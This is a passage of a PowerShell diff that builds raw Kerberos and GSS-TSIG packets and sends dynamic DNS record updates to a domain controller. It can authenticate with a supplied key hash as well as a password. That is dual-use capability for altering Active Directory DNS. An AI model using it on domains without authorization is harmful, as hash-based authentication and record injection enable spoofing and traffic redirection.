+ [Byte[]]$penultimate_block = $encrypted_data[($encrypted_data.Count - $final_block_length - 16)..($encrypted_data.Count - $final_block_length - 1)]
+ $AES = New-Object "System.Security.Cryptography.AesManaged"
+ $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
+ $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
+ $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $AES.KeySize = 256
+ $AES.Key = $ke_key
+ $AES_decryptor = $AES.CreateDecryptor()
+ $penultimate_block_cleartext = $AES_decryptor.TransformFinalBlock($penultimate_block,0,$penultimate_block.Length)
+ [Byte[]]$final_block_padding = $penultimate_block_cleartext[$final_block_length..$penultimate_block_cleartext.Count]
+ $final_block += $final_block_padding
+ [Byte[]]$cts_encrypted_data = $encrypted_data[0..($encrypted_data.Count - $final_block_length - 17)] + $final_block + $penultimate_block
+ [Byte[]]$cleartext = $AES_decryptor.TransformFinalBlock($cts_encrypted_data,0,$cts_encrypted_data.Length)
+
+ return $cleartext
+ }
+
+ function New-KerberosPACTimestamp
+ {
+ param([Byte[]]$ke_key)
+
+ [Byte[]]$timestamp = Get-KerberosTimestampUTC
+ [String]$confounder = [String](1..16 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ [Byte[]]$confounder = $confounder.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ [Byte[]]$PAC_Timestamp = $confounder +
+ 0x30,0x1a,0xa0,0x11,0x18,0x0f +
+ $timestamp +
+ 0xa1,0x05,0x02,0x03,0x01,0x70,0x16
+
+ return $PAC_Timestamp
+ }
+
+ function New-KerberosAuthenticator
+ {
+ param([Byte[]]$realm,[Byte[]]$username,[Byte[]]$subkey,[Byte[]]$sequence_number)
+
+ $parameter_length = $realm.Count + $username.Count + $subkey.Count
+ [Byte[]]$subkey_length = Get-ASN1LengthArray $subkey.Count
+ [Byte[]]$subkey_length2 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + 1)
+ [Byte[]]$subkey_length3 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + $subkey_length2.Count + 7)
+ [Byte[]]$subkey_length4 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + $subkey_length2.Count + $subkey_length3.Count + 8)
+ [Byte[]]$cname_length = Get-ASN1LengthArray $username.Count
+ [Byte[]]$cname_length2 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + 1)
+ [Byte[]]$cname_length3 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + 2)
+ [Byte[]]$cname_length4 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + 8)
+ [Byte[]]$cname_length5 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + 9)
+ [Byte[]]$crealm_length = Get-ASN1LengthArray $realm.Count
+ [Byte[]]$crealm_length2 = Get-ASN1LengthArray ($realm.Count + $crealm_length.Count + 1)
+ [Byte[]]$authenticator_length = Get-ASN1LengthArrayLong ($parameter_length + 99 + $crealm_length.Count + $crealm_length2.Count +
+ $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count + $subkey_length.Count +
+ $subkey_length2.Count + $subkey_length3.Count + $subkey_length4.Count)
+ [Byte[]]$authenticator_length2 = Get-ASN1LengthArrayLong ($parameter_length + 100 + $crealm_length.Count + $crealm_length2.Count +
+ $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count + $subkey_length.Count +
+ $subkey_length2.Count + $subkey_length3.Count + $subkey_length4.Count + $authenticator_length.Count)
+
+ $packet_KerberosAuthenticator = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_KerberosAuthenticator.Add("Encoding",[Byte[]](0x62) + $authenticator_length2 + [Byte[]](0x30) + $authenticator_length)
+ $packet_KerberosAuthenticator.Add("AuthenticatorVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAuthenticator.Add("AuthenticatorVNO",[Byte[]](0x05))
+ $packet_KerberosAuthenticator.Add("CRealm_Encoding",[Byte[]](0xa1) + $crealm_length2 + [Byte[]](0x1b) + $crealm_length)
+ $packet_KerberosAuthenticator.Add("CRealm",$realm)
+ $packet_KerberosAuthenticator.Add("CName_Encoding",[Byte[]](0xa2) + $cname_length5 + [Byte[]](0x30) + $cname_length4)
+ $packet_KerberosAuthenticator.Add("CName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAuthenticator.Add("CName_NameType",[Byte[]](0x01))
+ $packet_KerberosAuthenticator.Add("CName_CNameString_Encoding",[Byte[]](0xa1) + $cname_length3 + [Byte[]](0x30) +
+ $cname_length2 + [Byte[]](0x1b) + $cname_length)
+ $packet_KerberosAuthenticator.Add("CName_CNameString",$username)
+ $packet_KerberosAuthenticator.Add("CKSum_Encoding",[Byte[]](0xa3,0x25,0x30,0x23,0xa0,0x05,0x02,0x03))
+ $packet_KerberosAuthenticator.Add("CKSum_CKSumType",[Byte[]](0x00,0x80,0x03))
+ $packet_KerberosAuthenticator.Add("CKSum_Length_Encoding",[Byte[]](0xa1,0x1a,0x04,0x18))
+ $packet_KerberosAuthenticator.Add("CKSum_Length",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_KerberosAuthenticator.Add("CKSum_Bnd",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_KerberosAuthenticator.Add("CKSum_Flags",[Byte[]](0x36,0x01,0x00,0x00))
+ $packet_KerberosAuthenticator.Add("CKSum_CUSec_Encoding",[Byte[]](0xa4,0x05,0x02,0x03))
+ $packet_KerberosAuthenticator.Add("CKSum_CUSec",(Get-KerberosMicrosecond))
+ $packet_KerberosAuthenticator.Add("CKSum_CTime_Encoding",[Byte[]](0xa5,0x11,0x18,0x0f))
+ $packet_KerberosAuthenticator.Add("CKSum_CTime",(Get-KerberosTimestampUTC))
+ $packet_KerberosAuthenticator.Add("CKSum_Subkey_Encoding",[Byte[]](0xa6) + $subkey_length4 + [Byte[]](0x30) + $subkey_length3)
+ $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyType",[Byte[]](0x12))
+ $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyValue_Encoding",[Byte[]](0xa1) + $subkey_length2 + [Byte[]](0x04) + $subkey_length)
+ $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyValue",$subkey)
+ $packet_KerberosAuthenticator.Add("CKSum_SEQNumber_Encoding",[Byte[]](0xa7,0x06,0x02,0x04))
+ $packet_KerberosAuthenticator.Add("CKSum_SEQNumber",$sequence_number)
+
+ return $packet_KerberosAuthenticator
+ }
+
+ function Get-KerberosTimestampUTC
+ {
+ [DateTime]$timestamp = (Get-Date).ToUniversalTime()
+ [String]$timestamp = ("{0:u}" -f $timestamp) -replace "-","" -replace " ","" -replace ":",""
+ [Byte[]]$timestamp = [System.Text.Encoding]::UTF8.GetBytes($timestamp)
+
+ return $timestamp
+ }
+
+ function Get-KerberosMicrosecond
+ {
+ [Int]$microseconds = Get-Date -Format ffffff
+ [Byte[]]$microseconds = [System.Bitconverter]::GetBytes($microseconds)[0..2]
+
+ return $microseconds
+ }
+
+ function Protect-KerberosAES256CTS
+ {
+ param([Byte[]]$ke_key,[Byte[]]$data)
+
+ $AES = New-Object "System.Security.Cryptography.AesManaged"
+ $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
+ $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
+ $IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $AES.IV = $IV
+ $AES.KeySize = 256
+ $AES.Key = $ke_key
+ $AES_encryptor = $AES.CreateEncryptor()
+ $data_encrypted = $AES_encryptor.TransformFinalBlock($data,0,$data.Length)
+ $block_count = [Math]::Ceiling($data_encrypted.Count / 16)
+
+ if($block_count -gt 2)
+ {
+ $data_encrypted = $data_encrypted[0..($data_encrypted.Count - 33)] + $data_encrypted[($data_encrypted.Count - 16)..$data_encrypted.Count] +
+ $data_encrypted[($data_encrypted.Count - 32)..($data_encrypted.Count - 17)]
+ }
+ elseif($blocks -eq 2)
+ {
+ $data_encrypted = $data_encrypted[16..31] + $data_encrypted[0..15]
+ }
+
+ $final_block_length = [Math]::Truncate($data.Count % 16)
+
+ if($final_block_length -ne 0)
+ {
+ $remove_count = 16 - $final_block_length
+ $data_encrypted = $data_encrypted[0..($data_encrypted.Count - $remove_count - 1)]
+ }
+
+ return $data_encrypted
+ }
+ # TCPClient Kerberos end
+
+ function Get-KerberosHMACSHA1
+ {
+ param([Byte[]]$key,[Byte[]]$data)
+
+ $HMAC_SHA1 = New-Object System.Security.Cryptography.HMACSHA1
+ $HMAC_SHA1.key = $key
+ $hash = $HMAC_SHA1.ComputeHash($data)
+ $hash = $hash[0..11]
+
+ return $hash
+ }
+
+ function Get-ASN1LengthArray
+ {
+ param([Int]$length)
+
+ [Byte[]]$asn1 = [System.BitConverter]::GetBytes($length)
+
+ if($asn1[1] -eq 0)
+ {
+ $asn1 = $asn1[0]
+ }
+ else
+ {
+ $asn1 = $asn1[1,0]
+ }
+
+ return $asn1
+ }
+
+ function Get-ASN1LengthArrayLong
+ {
+ param([Int]$length)
+
+ [Byte[]]$asn1 = [System.BitConverter]::GetBytes($length)
+
+ if($asn1[1] -eq 0)
+ {
+ $asn1 = $asn1[0]
+ $asn1 = [Byte[]]0x81 + $asn1
+ }
+ else
+ {
+ $asn1 = $asn1[1,0]
+ $asn1 = [Byte[]]0x82 + $asn1
+ }
+
+ return $asn1
+ }
+
+ function New-RandomByteArray
+ {
+ param([Int]$length,[Int]$minimum=1,[Int]$maximum=255)
+
+ [String]$random = [String](1..$length | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum $minimum -Maximum $maximum)})
+ [Byte[]]$random = $random.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ return $random
+ }
+
+ function New-DNSNameArray
+ {
+ param([String]$name)
+
+ $character_array = $name.ToCharArray()
+ [Array]$index_array = 0..($character_array.Count - 1) | Where-Object {$character_array[$_] -eq '.'}
+
+ if($index_array.Count -gt 0)
+ {
+
+ $name_start = 0
+
+ ForEach ($index in $index_array)
+ {
+ $name_end = $index - $name_start
+ [Byte[]]$name_array += $name_end
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start,$name_end))
+ $name_start = $index + 1
+ }
+
+ [Byte[]]$name_array += ($name.Length - $name_start)
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start))
+ }
+ else
+ {
+ [Byte[]]$name_array = $name.Length
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start))
+ }
+
+ return $name_array
+ }
+
+ function New-PacketDNSQuery
+ {
+ param([Byte[]]$name,[byte[]]$type,[Byte[]]$apreq)
+
+ [Byte[]]$transaction_id = New-RandomByteArray 2
+
+ if($apreq)
+ {
+ $mechtoken_length = Get-ASN1LengthArrayLong ($apreq.Count)
+ $mechtoken_length2 = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + 1)
+ $innercontexttoken_length = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count + 17) # 31
+ $innercontexttoken_length2 = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count +
+ $innercontexttoken_length.Count + 18)
+ $spnego_length = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count +
+ $innercontexttoken_length.Count + $innercontexttoken_length2.Count + 27)
+ $grouped_length = $apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count + $innercontexttoken_length.Count +
+ $innercontexttoken_length2.Count + $spnego_length.Count + 25
+ $key_size = [System.BitConverter]::GetBytes($grouped_length + 3)[1,0]
+ $rd_length = [System.BitConverter]::GetBytes($grouped_length + $key_size.Count + 27)[1,0]
+ $inception = [int64](([datetime]::UtcNow)-(Get-Date "1/1/1970")).TotalSeconds
+ $inception = [System.BitConverter]::GetBytes($inception)
+ $inception = $inception[3..0]
+ }
+
+ if($apreq)
+ {
+ [Byte[]]$length = [System.BitConverter]::GetBytes($grouped_length + $name.Count + 57)[1,0]
+ }
+ else
+ {
+ [Byte[]]$length = [System.BitConverter]::GetBytes($name.Count + 16)[1,0]
+ }
+
+ $packet_DNSQuery = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_DNSQuery.Add("Length",$length)
+ $packet_DNSQuery.Add("TransactionID",$transaction_ID)
+ $packet_DNSQuery.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_DNSQuery.Add("Questions",[Byte[]](0x00,0x01))
+ $packet_DNSQuery.Add("AnswerRRs",[Byte[]](0x00,0x00))
+ $packet_DNSQuery.Add("AuthorityRRs",[Byte[]](0x00,0x00))
+
+ if($apreq)
+ {
+ $packet_DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x01))
+ }
+ else
+ {
+ $packet_DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x00))
+ }
+
+ $packet_DNSQuery.Add("Queries_Name",$name)
+ $packet_DNSQuery.Add("Queries_Type",$type)
+ $packet_DNSQuery.Add("Queries_Class",[Byte[]](0x00,0xff))
+
+ if($apreq)
+ {
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_Name",[Byte[]](0xc0,0x0c))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_Type",[Byte[]](0x00,0xf9))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_Class",[Byte[]](0x00,0xff))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_TTL",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RDLength",$rd_length)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Algorithm",[Byte[]](0x08,0x67,0x73,0x73,0x2d,0x74,0x73,0x69,0x67,0x00))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Inception",$inception)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Expiration",$inception)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Mode",[Byte[]](0x00,0x03))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Error",[Byte[]](0x00,0x00))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_KeySize",$key_size)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_Encoding",[Byte[]](0x60) + $spnego_length)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_ThisMech",[Byte[]](0x06,0x06,0x2b,0x06,0x01,0x05,0x05,0x02))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_Encoding",[Byte[]](0xa0) + $innercontexttoken_length2 + [Byte[]](0x30) +
+ $innercontexttoken_length)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechTypes_Encoding",[Byte[]](0xa0,0x0d,0x30,0x0b))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechType0",[Byte[]](0x06,0x09,0x2a,0x86,0x48,0x86,0xf7,0x12,0x01,0x02,0x02))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechToken_Encoding",[Byte[]](0xa2) + $mechtoken_length2 + [Byte[]](0x04) +
+ $mechtoken_length)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechToken_Token",$apreq)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_OtherSize",[Byte[]](0x00,0x00))
+ }
+
+ return $packet_DNSQuery
+ }
+
+ function New-PacketDNSUpdate
+ {
+ param([Byte[]]$transaction_ID,[String]$zone,[String]$name,[String]$type,[Int]$TTL,[Int]$preference,[Int]$priority,[Int]$weight,[Int]$port,[String]$data,[Byte[]]$time_signed,[Byte[]]$tkey_name,[Byte[]]$MAC)
+
+ if($data)
+ {
+ $add = $true
+ [Byte[]]$class = 0x00,0x01
+ }
+ else
+ {
+ [Byte[]]$class = 0x00,0xff
+ $TTL = 0
+ }
+
+ switch ($type)
+ {
+
+ 'A'
+ {
+ [Byte[]]$type = 0x00,0x01
+
+ if($data -and [Bool]($data -as [System.Net.IPAddress]))
+ {
+ [Byte[]]$data = ([System.Net.IPAddress][String]([System.Net.IPAddress]$data)).GetAddressBytes()
+ }
+ elseif($data)
+ {
+ [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
+ }
+
+ }
+
+ 'AAAA'
+ {
+ [Byte[]]$type = 0x00,0x1c
+
+ if($data -and [Bool]($data -as [System.Net.IPAddress]))
+ {
+ [Byte[]]$data = ([System.Net.IPAddress][String]([System.Net.IPAddress]$data)).GetAddressBytes()
+ }
+ elseif($data)
+ {
+ [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
+ }
+
+ }
+
+ 'CNAME'
+ {
+ [Byte[]]$type = 0x00,0x05
+
+ if($data -and [Bool]($data -as [System.Net.IPAddress]))
+ {
+ [Byte[]]$data = (New-DNSNameArray $data) + 0x00
+ }
+ elseif($data)
+ {
+ [Byte[]]$data = (New-DNSNameArray ($data -replace ('.' + $zone),'')) + 0xc0,0x0c
+ }
+
+ }
+
+ 'MX'
+ {
+ $MX = $true
+ [Byte[]]$type = 0x00,0x0f
+
+ if($data)
+ {
+ $extra_length = 2
+ [Byte[]]$preference = [System.Bitconverter]::GetBytes($preference)[1,0]
+ }
+
+ if($data -and [Bool]($data -as [System.Net.IPAddress]))
+ {
+ [Byte[]]$data = (New-DNSNameArray $data) + 0x00
+ }
+ elseif($data)
+ {
+ [Byte[]]$data = (New-DNSNameArray ($data -replace ('.' + $zone),'')) + 0xc0,0x0c
+ }
+
+ }
+
+ 'PTR'
+ {
+ [Byte[]]$type = 0x00,0x0c
+
+ if($data)
+ {
+ [Byte[]]$data = (New-DNSNameArray $data) + 0x00
+ }
+
+ }
+
+ 'SRV'
+ {
+ $SRV = $true
+ [Byte[]]$type = 0x00,0x21
+
+ if($data)
+ {
+ [Byte[]]$priority = [System.Bitconverter]::GetBytes($priority)[1,0]
+ [Byte[]]$weight = [System.Bitconverter]::GetBytes($weight)[1,0]
+ [Byte[]]$port = [System.Bitconverter]::GetBytes($port)[1,0]
+ $extra_length = 6
+ [Byte[]]$data = (New-DNSNameArray $data) + 0x00
+ }
+
+ }
+
+ 'TXT'
+ {
+ $TXT = $true
+ [Byte[]]$type = 0x00,0x10
+ [Byte[]]$TXT_length = [System.BitConverter]::GetBytes($data.Length)[0]
+
+ if($data)
+ {
+ $extra_length = 1
+ [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
+ }
+
+ }
+
+ }
+
+ if($name -eq $zone)
+ {
+ [Byte[]]$name = 0xc0,0x0c
+ }
+ else
+ {
+ [Byte[]]$name = (New-DNSNameArray ($name -replace ('.' + $zone),'')) + 0xc0,0x0c
+ #[Byte[]]$name = (New-DNSNameArray $name) + 0x00
+ }
+
+ [Byte[]]$zone = (New-DNSNameArray $zone) + 0x00
+ [Byte[]]$TTL = [System.Bitconverter]::GetBytes($TTL)[3..0]
+ [Byte[]]$data_length = [System.BitConverter]::GetBytes($data.Length + $extra_length)[1,0]
+
+ if($MAC)
+ {
+ [Byte[]]$length = [System.BitConverter]::GetBytes($zone.Count + $name.Count + $data.Length + $tkey_name.Count + $MAC.Count + 62 + $extra_length)[1,0]
+ }
+ elseif(!$tkey_name)
+ {
+ [Byte[]]$length = [System.BitConverter]::GetBytes($zone.Count + $name.Count + $data.Length + 26 + $extra_length)[1,0]
+ }
+
+ $packet_DNSUpdate = New-Object System.Collections.Specialized.OrderedDictionary
+
+ if(!$tkey_name -or $MAC)
+ {
+ $packet_DNSUpdate.Add("Length",$length)
+ }
+
+ $packet_DNSUpdate.Add("TransactionID",$transaction_ID)
+ $packet_DNSUpdate.Add("Flags",[Byte[]](0x28,0x00))
+ $packet_DNSUpdate.Add("Zones",[Byte[]](0x00,0x01))
+ $packet_DNSUpdate.Add("Prerequisites",[Byte[]](0x00,0x00))
+ $packet_DNSUpdate.Add("Updates",[Byte[]](0x00,0x01))
+
+ if($MAC)
+ {
+ $packet_DNSUpdate.Add("AdditionalRRs",[Byte[]](0x00,0x01))
+ }
+ else
+ {
+ $packet_DNSUpdate.Add("AdditiionalRRs",[Byte[]](0x00,0x00))
+ }
+
+ $packet_DNSUpdate.Add("Zone_Name",$zone)
+ $packet_DNSUpdate.Add("Zone_Type",[Byte[]](0x00,0x06))
+ $packet_DNSUpdate.Add("Zone_Class",[Byte[]](0x00,0x01))
+ $packet_DNSUpdate.Add("Updates_Name",$name)
+ $packet_DNSUpdate.Add("Updates_Type",$type)
+ $packet_DNSUpdate.Add("Updates_Class",$class)
+ $packet_DNSUpdate.Add("Updates_TTL",$TTL)
+ $packet_DNSUpdate.Add("Updates_DataLength",$data_length)
+
+ if($MX)
+ {
+ $packet_DNSUpdate.Add("Updates_TXTLength",$preference)
+ }
+
+ if($TXT -and $add)
+ {
+ $packet_DNSUpdate.Add("Updates_TXTLength",$TXT_length)
+ }
+
+ if($SRV -and $add)
+ {
+ $packet_DNSUpdate.Add("Updates_Priority",$priority)
+ $packet_DNSUpdate.Add("Updates_Weight",$weight)
+ $packet_DNSUpdate.Add("Updates_Port",$port)
+ }
+
+ if($add)
+ {
+ $packet_DNSUpdate.Add("Updates_Address",$data)
+ }
+
+ if($tkey_name)
+ {
+ $packet_DNSUpdate.Add("AdditionalRecords_Name",$tkey_name)
+
+ if($MAC)
+ {
+ $packet_DNSUpdate.Add("AdditionalRecords_Type",[Byte[]](0x00,0xfa))
+ }
+
+ $packet_DNSUpdate.Add("AdditionalRecords_Class",[Byte[]](0x00,0xff))
+ $packet_DNSUpdate.Add("AdditionalRecords_TTL",[Byte[]](0x00,0x00,0x00,0x00))
+
+ if($MAC)
+ {
+ $packet_DNSUpdate.Add("AdditionalRecords_DataLength",[Byte[]](0x00,0x36))
+ }
+
+ $packet_DNSUpdate.Add("AdditionalRecords_AlgorithmName",[Byte[]](0x08,0x67,0x73,0x73,0x2d,0x74,0x73,0x69,0x67,0x00))
+ $packet_DNSUpdate.Add("AdditionalRecords_TimeSigned",$time_signed)
+ $packet_DNSUpdate.Add("AdditionalRecords_Fudge",[Byte[]](0x01,0x2c))
+
+ if($MAC)
+ {
+ $packet_DNSUpdate.Add("AdditionalRecords_MACSize",[Byte[]](0x00,0x1c))
+ $packet_DNSUpdate.Add("AdditionalRecords_MAC",$MAC)
+ $packet_DNSUpdate.Add("AdditionalRecords_OriginalID",$transaction_ID)
+ }
+
+ $packet_DNSUpdate.Add("AdditionalRecords_Error",[Byte[]](0x00,0x00))
+ $packet_DNSUpdate.Add("AdditionalRecords_OtherLength",[Byte[]](0x00,0x00))
+ }
+
+ return $packet_DNSUpdate
+ }
+
+ function New-PacketDNSUpdateMAC
+ {
+ param([Byte[]]$flags,[Byte[]]$sequence_number,[Byte[]]$checksum)
+
+ $packet_DNSUpdateMAC = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_DNSUpdateMAC.Add("DNSUpdateMAC_TokenID",[Byte[]](0x04,0x04))
+ $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Flags",$flags)
+ $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Filler",[Byte[]](0xff,0xff,0xff,0xff,0xff))
+ $packet_DNSUpdateMAC.Add("DNSUpdateMAC_SequenceNumber",[Byte[]](0x00,0x00,0x00,0x00) + $sequence_number)
+
+ if($checksum)
+ {
+ $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Checksum",$checksum)
+ }
+
+ return $packet_DNSUpdateMAC
+ }
+
+ function Get-DNSUpdateResponseStatus
+ {
+ param([Byte[]]$DNS_client_receive)
+
+ $DNS_response_flags = [System.BitConverter]::ToString($DNS_client_receive[4..5])
+ $DNS_response_flags = $DNS_response_flags -replace "-",""
+
+ switch ($DNS_response_flags)
+ {
+ 'A800' {$DNS_update_response_status = "[+] DNS update successful"}
+ 'A801' {$DNS_update_response_status = ("[-] format error 0x" + $DNS_response_flags)}
+ 'A802' {$DNS_update_response_status = ("[-] failed to complete 0x" + $DNS_response_flags)}
+ 'A804' {$DNS_update_response_status = ("[-] not implemented 0x" + $DNS_response_flags)}
+ 'A805' {$DNS_update_response_status = ("[-] update refused 0x" + $DNS_response_flags)}
+ Default {$DNS_update_response_status = ("[-] DNS update was not successful 0x" + $DNS_response_flags)}
+ }
+
+ return $DNS_update_response_status
+ }
+
+ $DNS_client = New-Object System.Net.Sockets.TCPClient
+ $DNS_client.Client.ReceiveTimeout = 3000
+
+ if($Security -ne 'Secure')
+ {
+
+ try
+ {
+ $DNS_client.Connect($DomainController,"53")
+ }
+ catch
+ {
+ Write-Output "$DomainController did not respond on TCP port 53"
+ }
+
+ if($DNS_client.Connected)
+ {
+ $DNS_client_stream = $DNS_client.GetStream()
+ $DNS_client_receive = New-Object System.Byte[] 2048
+ [Byte[]]$transaction_id = New-RandomByteArray 2
+ $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData
+ [Byte[]]$DNSUpdate = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
+ $DNS_client_send = $DNSUpdate
+ $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
+ $DNS_client_stream.Flush()
+ $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
+ $DNS_update_response_status = Get-DNSUpdateResponseStatus $DNS_client_receive
+ Write-Output $DNS_update_response_status
+ $DNS_client.Close()
+ $DNS_client_stream.Close()
+ }
+
+ }
+
+ if($Security -eq 'Secure' -or ($Security -eq 'Auto' -and $DNS_update_response_status -like '*0xA805'))
+ {
+ $tkey = "6" + ((0..9) | Get-Random -Count 2) + "-ms-7.1-" + ((0..9) | Get-Random -Count 4) + "." + ((0..9) | Get-Random -Count 8) +
+ "-" + ((0..9) | Get-Random -Count 4) + "-11e7-" + ((0..9) | Get-Random -Count 4) + "-000c296694e0"
+ $tkey = $tkey -replace " ",""
+ Write-Verbose "[+] TKEY name $tkey"
+ [Byte[]]$tkey_name = [System.Text.Encoding]::UTF8.GetBytes($tkey)
+ $tkey_name = [Byte[]]0x08 + $tkey_name + 0x00
+ $tkey_name[9] = 0x06
+ $tkey_name[16] = 0x24
+
+ if($kerberos_tcpclient)
+ {
+ $kerberos_client = New-Object System.Net.Sockets.TCPClient
+ $kerberos_client.Client.ReceiveTimeout = 3000
+ $domain_controller = [System.Text.Encoding]::UTF8.GetBytes($DomainController)
+ $kerberos_username = [System.Text.Encoding]::UTF8.GetBytes($Username)
+ $kerberos_realm = [System.Text.Encoding]::UTF8.GetBytes($Realm)
+
+ try
+ {
+ $kerberos_client.Connect($DomainController,"88")
+ }
+ catch
+ {
+ Write-Output "$DomainController did not respond on TCP port 88"
+ }
+
+ }
+
+ if(!$kerberos_tcpclient -or $kerberos_client.Connected)
+ {
+
+ if($kerberos_tcpclient)
+ {
+
+ if($Hash)
+ {
+ $base_key = (&{for ($i = 0;$i -lt $hash.Length;$i += 2){$hash.SubString($i,2)}}) -join "-"
+ $base_key = $base_key.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+ else
+ {
+ $base_key = Get-KerberosAES256BaseKey $salt $password
+ }
+
+ $ke_key = Get-KerberosAES256UsageKey encrypt 1 $base_key
+ $ki_key = Get-KerberosAES256UsageKey integrity 1 $base_key
+ $nonce = New-RandomByteArray 4
+ $kerberos_client_stream = $kerberos_client.GetStream()
+ $kerberos_client_receive = New-Object System.Byte[] 2048
+ $packet_AS_REQ = New-PacketKerberosASREQ $kerberos_username $kerberos_realm $domain_controller $nonce
+ $AS_REQ = ConvertFrom-PacketOrderedDictionary $packet_AS_REQ
+ $kerberos_client_send = $AS_REQ
+ $kerberos_client_stream.Write($kerberos_client_send,0,$kerberos_client_send.Length) > $null
+ $kerberos_client_stream.Flush()
+ $kerberos_client_stream.Read($kerberos_client_receive,0,$kerberos_client_receive.Length) > $null
+ [Byte[]]$PAC_Timestamp = New-KerberosPACTimestamp $ke_key
+ [Byte[]]$PAC_ENC_Timestamp = Protect-KerberosAES256CTS $ke_key $PAC_Timestamp
+ [Byte[]]$PAC_Timestamp_Signature = Get-KerberosHMACSHA1 $ki_key $PAC_Timestamp
+ $packet_AS_REQ = New-PacketKerberosASREQ $kerberos_username $kerberos_realm $domain_controller $nonce $PAC_ENC_Timestamp $PAC_Timestamp_Signature
+ $AS_REQ = ConvertFrom-PacketOrderedDictionary $packet_AS_REQ
+ $kerberos_client_send = $AS_REQ
+ $kerberos_client_stream.Write($kerberos_client_send,0,$kerberos_client_send.Length) > $null
+ $kerberos_client_stream.Flush()
+ $kerberos_client_stream.Read($kerberos_client_receive,0,$kerberos_client_receive.Length) > $null
+ $asrep_payload = [System.BitConverter]::ToString($kerberos_client_receive)
+ $asrep_payload = $asrep_payload -replace "-",""
+ $kerberos_client.Close()
